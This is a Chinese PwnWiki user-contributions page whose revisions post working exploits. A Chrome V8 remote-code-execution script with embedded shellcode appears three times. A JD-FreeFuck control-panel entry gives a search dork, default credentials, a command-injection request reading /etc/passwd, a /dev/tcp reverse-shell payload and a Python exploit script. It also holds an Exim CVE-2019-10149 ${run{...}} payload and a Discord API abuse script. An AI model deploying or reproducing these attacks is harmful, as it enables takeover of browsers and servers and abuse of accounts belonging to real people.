PwnWiki - User contributions [Chinese]

Windows Chrome 0day漏洞

2021-04-14T03:26:20Z

Esonhugh:

<languages />
<translate>
==前提條件== 
</translate>
<translate>

v8 javascript 解释器
仅支持 Windows x64 Chrome
</translate>

==EXP==
===exploit.html===
<pre>
<script src="exploit.js"></script>
</pre>
===exploit.js===
<pre>
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
let buf2 = new ArrayBuffer(0x150);

function ftoi(val) {
f64_buf[0] = val;
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) {
u64_buf[0] = Number(val & 0xffffffffn);
u64_buf[1] = Number(val >> 32n);
return f64_buf[0];
}

const _arr = new Uint32Array([2**31]);

function foo(a) {
var x = 1;
x = (_arr[0] ^ 0) + 1;

x = Math.abs(x);
x -= 2147483647;
x = Math.max(x, 0);

x -= 1;
if(x==-1) x = 0;

var arr = new Array(x);
arr.shift();
var cor = [1.1, 1.2, 1.3];

return [arr, cor];
}

for(var i=0;i<0x3000;++i)
foo(true);

var x = foo(false);
var arr = x[0];
var cor = x[1];

const idx = 6;
arr[idx+10] = 0x4242;

function addrof(k) {
arr[idx+1] = k;
return ftoi(cor[0]) & 0xffffffffn;
}

function fakeobj(k) {
cor[0] = itof(k);
return arr[idx+1];
}

var float_array_map = ftoi(cor[3]);

var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var fake = fakeobj(addrof(arr2) + 0x20n);

function arbread(addr) {
if (addr % 2n == 0) {
addr += 1n;
}
arr2[1] = itof((2n << 32n) + addr - 8n);
return (fake[0]);
}

function arbwrite(addr, val) {
if (addr % 2n == 0) {
addr += 1n;
}
arr2[1] = itof((2n << 32n) + addr - 8n);
fake[0] = itof(BigInt(val));
}

function copy_shellcode(addr, shellcode) {
let dataview = new DataView(buf2);
let buf_addr = addrof(buf2);
let backing_store_addr = buf_addr + 0x14n;
arbwrite(backing_store_addr, addr);

for (let i = 0; i < shellcode.length; i++) {
dataview.setUint32(4*i, shellcode[i], true);
}
}

var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
copy_shellcode(rwx_page_addr, shellcode);
f();
</pre>
<translate>
==警告== 
</translate>
<translate>

使用该漏洞需要 chrome 无沙箱环境，否则会提示 <code>status_access_violation</code>或者内存崩溃


關閉沙箱可以彈出計算器
如果无可以尝试刷新界面
</translate>

==版本==
Chrome <=89.0.4389.114
== 引用链接 ==
https://github.com/r4j0x00/exploits/tree/master/chrome-0day

Talk:Windows Chrome 0day漏洞

2021-04-14T03:23:29Z

Esonhugh:

<strong>编辑人： Esonhugh 留言 </strong>
<p>这里有点问题关于文本的标题不是很恰当请改成 chrome v8 JavaScript 解释器 BOF RCE 漏洞</p>

Talk:Windows Chrome 0day漏洞

2021-04-14T03:22:12Z

Esonhugh: Created page with "<p>这里有点问题关于文本的标题不是很恰当请改成 chrome v8 JavaScript 解释器 BOF RCE 漏洞<p>"

<p>这里有点问题关于文本的标题不是很恰当请改成 chrome v8 JavaScript 解释器 BOF RCE 漏洞<p>

Windows Chrome 0day漏洞

2021-04-14T03:20:13Z

Esonhugh: 警告描述

<languages />
<translate>
==前提條件== 
</translate>
<translate>

僅支持Windows Chrome
</translate>
==EXP==
===exploit.html===
<pre>
<script src="exploit.js"></script>
</pre>
===exploit.js===
<pre>
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
let buf2 = new ArrayBuffer(0x150);

function ftoi(val) {
f64_buf[0] = val;
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) {
u64_buf[0] = Number(val & 0xffffffffn);
u64_buf[1] = Number(val >> 32n);
return f64_buf[0];
}

const _arr = new Uint32Array([2**31]);

function foo(a) {
var x = 1;
x = (_arr[0] ^ 0) + 1;

x = Math.abs(x);
x -= 2147483647;
x = Math.max(x, 0);

x -= 1;
if(x==-1) x = 0;

var arr = new Array(x);
arr.shift();
var cor = [1.1, 1.2, 1.3];

return [arr, cor];
}

for(var i=0;i<0x3000;++i)
foo(true);

var x = foo(false);
var arr = x[0];
var cor = x[1];

const idx = 6;
arr[idx+10] = 0x4242;

function addrof(k) {
arr[idx+1] = k;
return ftoi(cor[0]) & 0xffffffffn;
}

function fakeobj(k) {
cor[0] = itof(k);
return arr[idx+1];
}

var float_array_map = ftoi(cor[3]);

var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var fake = fakeobj(addrof(arr2) + 0x20n);

function arbread(addr) {
if (addr % 2n == 0) {
addr += 1n;
}
arr2[1] = itof((2n << 32n) + addr - 8n);
return (fake[0]);
}

function arbwrite(addr, val) {
if (addr % 2n == 0) {
addr += 1n;
}
arr2[1] = itof((2n << 32n) + addr - 8n);
fake[0] = itof(BigInt(val));
}

function copy_shellcode(addr, shellcode) {
let dataview = new DataView(buf2);
let buf_addr = addrof(buf2);
let backing_store_addr = buf_addr + 0x14n;
arbwrite(backing_store_addr, addr);

for (let i = 0; i < shellcode.length; i++) {
dataview.setUint32(4*i, shellcode[i], true);
}
}

var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
copy_shellcode(rwx_page_addr, shellcode);
f();
</pre>
<translate>
==警告== 
</translate>
<translate>

使用该漏洞需要 chrome 无沙箱环境，否则会提示 <code>status_access_violation</code>或者内存崩溃


關閉沙箱可以彈出計算器
如果无可以尝试刷新界面
</translate>

==版本==
Chrome <=89.0.4389.114
== 引用链接 ==
https://github.com/r4j0x00/exploits/tree/master/chrome-0day

Windows Chrome 0day漏洞

2021-04-14T03:17:44Z

Esonhugh: 修复中文界面的缺陷

<languages />
<translate>
==前提條件== 
</translate>
<translate>

僅支持Windows Chrome
</translate>
==EXP==
===exploit.html===
<pre>
<script src="exploit.js"></script>
</pre>
===exploit.js===
<pre>
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
let buf2 = new ArrayBuffer(0x150);

function ftoi(val) {
f64_buf[0] = val;
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) {
u64_buf[0] = Number(val & 0xffffffffn);
u64_buf[1] = Number(val >> 32n);
return f64_buf[0];
}

const _arr = new Uint32Array([2**31]);

function foo(a) {
var x = 1;
x = (_arr[0] ^ 0) + 1;

x = Math.abs(x);
x -= 2147483647;
x = Math.max(x, 0);

x -= 1;
if(x==-1) x = 0;

var arr = new Array(x);
arr.shift();
var cor = [1.1, 1.2, 1.3];

return [arr, cor];
}

for(var i=0;i<0x3000;++i)
foo(true);

var x = foo(false);
var arr = x[0];
var cor = x[1];

const idx = 6;
arr[idx+10] = 0x4242;

function addrof(k) {
arr[idx+1] = k;
return ftoi(cor[0]) & 0xffffffffn;
}

function fakeobj(k) {
cor[0] = itof(k);
return arr[idx+1];
}

var float_array_map = ftoi(cor[3]);

var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var fake = fakeobj(addrof(arr2) + 0x20n);

function arbread(addr) {
if (addr % 2n == 0) {
addr += 1n;
}
arr2[1] = itof((2n << 32n) + addr - 8n);
return (fake[0]);
}

function arbwrite(addr, val) {
if (addr % 2n == 0) {
addr += 1n;
}
arr2[1] = itof((2n << 32n) + addr - 8n);
fake[0] = itof(BigInt(val));
}

function copy_shellcode(addr, shellcode) {
let dataview = new DataView(buf2);
let buf_addr = addrof(buf2);
let backing_store_addr = buf_addr + 0x14n;
arbwrite(backing_store_addr, addr);

for (let i = 0; i < shellcode.length; i++) {
dataview.setUint32(4*i, shellcode[i], true);
}
}

var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
copy_shellcode(rwx_page_addr, shellcode);
f();
</pre>
<translate>
==警告== 
</translate>
<translate>

使用該漏洞需要關閉沙箱環境，如果不關閉沙箱會提示<code>status_access_violation</code>或者內存錯誤


關閉沙箱可以彈出計算器
</translate>

==版本==
Chrome <=89.0.4389.114

== 引用链接 ==
https://github.com/r4j0x00/exploits/tree/master/chrome-0day

JD-FreeFuck 後台命令執行漏洞

2021-04-02T12:13:25Z

Esonhugh: 增加一处 exp poc

<languages />
==FOFA==
<pre>
title="京东薅羊毛控制面板"
</pre>
<translate>
==默認帳號密碼== 
</translate>
<pre>
useradmin/supermanito
</pre>
<translate>
==漏洞利用== 
</translate>
<translate>

發送如下請求包執行命令：
</translate>
<pre>
POST /runCmd HTTP/1.1
Host: XXX.XXX.XXX.XXX:5678
Content-Length: 50
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U
Connection: close

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
</pre>
<translate>

其中 cmd 參數存在命令注入。
</translate>
==Getshell==
<pre>
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500
</pre>

==EXP==

====Usage:====
<pre>
python3 exploit.py -u http://xx.xx.xx.xx:5678 -c "command"

python3 exploit.py -u http://127.0.0.1:5678 -c "cat /etc/passwd"
</pre>

<pre>
import requests
import json
import sys
import argparse

def login(url,username="useradmin",password="supermanito"):
loginReq = requests.Session()
payload = {
"username":username,
"password":password
}
headers1 = {
"Accept": "*/*",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9"
}

headers = {
"Accept": "*/*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Origin": url,
"Referer": url,
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9"
}

loginReq.get(url, headers=headers1)
content = loginReq.post(url + "auth",data=payload,headers=headers)
response = json.loads(content.text)
# print(response["err"])
# print(loginReq.cookies)
if response["err"] == 0:
print("login success")
return(loginReq)
else:
print("login failure")
raise RuntimeError("Can't login,beacuse -> "+response["msg"])

def exploit(url,session,command):
''' POST form looks like
POST /runCmd HTTP/1.1
Host: XXX.XXX.XXX.XXXX:5678
Content-Length: 51
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: connect.0.3349226518321824=s%3AWfJDGLRc0_vdAuXSWDOYku1qMSLXcZjv.vr52DLelVmWNvsY2q7SQCH%2B8KmDzT0ds2eRw7Fay0Sc
Connection: close

cmd=bash+jd.sh+bean_change%3Bifconfig%3B&delay=1000
'''
headers = {
"Accept": "*/*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Connection": "close"
}
datas = {
"cmd":"bash+jd.sh+bean_change;"+command+";",
"delay":"1000"
}
response = session.post(url+"runCmd",data=datas,headers=headers)
# print(session.cookies)
objectResponse = json.loads(response.text)
# print(objectResponse)
if objectResponse["err"] == 0:
print("execute success","\n")
print(objectResponse)
print("$ "+command)
for line in objectResponse["msg"].split("\n"):
print(line)
else:
print("execute failure")
raise RuntimeError("Can't execute --> "+objectResponse["msg"])

if __name__ == "__main__" :
parser = argparse.ArgumentParser(description='this is the EXP of JD fuck')
parser.add_argument("-u",metavar="url",type=str,help="url there, e.g: http://127.0.0.1:5678/")
parser.add_argument("-c",metavar="command",type=str,help="execute command, e.g: ls")
# print(sys.argv[1:])
args = vars( parser.parse_args(sys.argv[1:]) )
url = args["u"]
command = args["c"]
exploit(url,login(url),command)
</pre>

<translate>
==參考== 
</translate>

https://www.secquan.org/Discuss/1071932#reply3

https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA

https://github.com/Esonhugh/JD-Freefuckfucker : exp/poc

JD-FreeFuck 後台命令執行漏洞

2021-04-01T12:17:20Z

Esonhugh: 增加poc/exp 并且删除了原有的 ip

<languages />
==FOFA==
<pre>
title="京东薅羊毛控制面板"
</pre>
<translate>
==默認帳號密碼== 
</translate>
<pre>
useradmin/supermanito
</pre>
<translate>
==漏洞利用== 
</translate>
<translate>

發送如下請求包執行命令：
</translate>
<pre>
POST /runCmd HTTP/1.1
Host: XXX.XXX.XXX.XXX:5678
Content-Length: 50
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U
Connection: close

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
</pre>
<translate>

其中 cmd 參數存在命令注入。
</translate>
==Getshell==
<pre>
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500
</pre>

== POC & EXP ==
<blockquote>import requests

import json

def login(url,username="useradmin",password="supermanito"):

loginReq = requests.Session()

payload = {

"username":username,

"password":password

}

headers1 = {

"Accept": "*/*",

"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",

"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",

"Accept-Encoding": "gzip, deflate",

"Accept-Language": "zh-CN,zh;q=0.9"

}

headers = {

"Accept": "*/*",

"X-Requested-With": "XMLHttpRequest",

"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",

"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",

"Origin": url,

"Referer": url,

"Accept-Encoding": "gzip, deflate",

"Accept-Language": "zh-CN,zh;q=0.9"

}

loginReq.get(url, headers=headers1)

content = loginReq.post(url + "auth",data=payload,headers=headers)

response = json.loads(content.text)

# print(response["err"])

# print(loginReq.cookies)

if response["err"] == 0:

print("login success")

return(loginReq)

else:

print("login failure")

raise RuntimeError("Can't login,beacuse -> "+response["msg"])

def exploit(url,session,command):

<nowiki>'''</nowiki> POST form looks like

POST /runCmd HTTP/1.1

Host: XXX.XXX.XXX.XXXX:5678

Content-Length: 51

Accept: */*

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: connect.0.3349226518321824=s%3AWfJDGLRc0_vdAuXSWDOYku1qMSLXcZjv.vr52DLelVmWNvsY2q7SQCH%2B8KmDzT0ds2eRw7Fay0Sc

Connection: close

cmd=bash+jd.sh+bean_change%3Bifconfig%3B&delay=1000

<nowiki>'''</nowiki>

headers = {

"Accept": "*/*",

"X-Requested-With": "XMLHttpRequest",

"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",

"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",

"Accept-Encoding": "gzip, deflate",

"Accept-Language": "zh-CN,zh;q=0.9",

"Connection": "close"

}

datas = {

"cmd":"bash+jd.sh+bean_change;"+command+";",

"delay":"1000"

}

session.get(url+"home",headers=headers)

session.get(url+"run",headers=headers)

session.get(url+"runCmd",headers=headers)

response = session.post(url+"runCmd",data=datas,headers=headers)

# print(session.cookies)

objectResponse = json.loads(response.text)

# print(objectResponse)

if objectResponse["err"] == 0:

print("execute success","\n")

print("$ "+command)

for line in objectResponse["msg"].split("\n")[1:-1]:

print(line)

else:

print("execute failure")

raise RuntimeError("Can't execute --> "+objectResponse["msg"])

url = "<nowiki>http://ip:port/</nowiki>"

exploit(url,login(url),"ifconfig")</blockquote><translate>
==參考== 
</translate>

https://www.secquan.org/Discuss/1071932#reply3

https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA

CVE-2019-10149 Exim郵箱服務漏洞

2021-03-20T13:32:04Z

Esonhugh: 增加一些信息并且加入 poc 的引用

<languages />

== '''影响范围''' ==
Exim 版本 4.87 至 4.91

==POC==
<pre>
'RCPT TO "${run{...}}@relaydomain.com"'
</pre>

<pre>
noob+${run{/usr/bin/touch /tmp/hello}}@myserver.com
</pre>

== '''引用''' ==
https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py

Discord API濫用0day

2021-03-20T13:17:27Z

Esonhugh: exp 运行的时候缺少参数

<languages />
{| style="margin: auto; width: 750px;"
| style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" |
{| cellspacing="2px"
| valign="middle" | [[Image:Hand.png|50px]]
| 這個頁面需要補充，如果您了解該內容，請直接編輯詞條。
|}
|}
<br><noinclude>
<translate>
==漏洞原理：== 
將賬戶的出生日期設置爲小於13歲以禁用Token，因爲Discord會自動禁用所有者小於13歲的賬戶。


請注意，已經設置DoB的賬戶不受到此漏洞影響。
</translate>
==EXP:==
Usage:
<pre>
py example.py <token> <channel-id>
</pre>
<pre>
# Name: 2000 Characters Limit Bypass
# Description: Sends an URI that contains characters that gets URL encoded when sent, which increases the length of the message.
# Author: checksum (@0daySkid)
# Original founder: Siaxos

import requests
import random
import sys

class Exploit:

def __init__(self, token, channel):
self.token = token
self.channel_id = channel
self.headers = {'Authorization': token}

@property
def uri(self):
chars = ''.join(random.choice('\'"^`|{}') for _ in range(1993))
return f'<a://a{chars}>'

def execute(self):
""" send magical URI """
return requests.post(f'https://discordapp.com/api/v6/channels/{self.channel_id}/messages', headers=self.headers, json={'content': self.uri})

def main():
if len(sys.argv) < 3:
print(f'Usage: py {sys.argv[0]} <token> <channel id>')
sys.exit()

token = sys.argv[1]
channel_id = sys.argv[2]

exploit = Exploit(token, channel_id)

exploit.execute()

if __name__ == '__main__':
main()
</pre>
<translate>
==作者：== 
原始作者未知。
</translate>